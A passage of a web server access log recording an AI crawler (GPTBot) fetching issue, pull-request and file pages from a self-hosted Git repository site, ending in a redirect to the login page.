"/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:18:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:18:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12221] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13326] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13337] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 12834] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12575] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12563] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=source" [Client 74.7.227.38] [Length 11565] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:18:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 10595] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:44:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:18:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 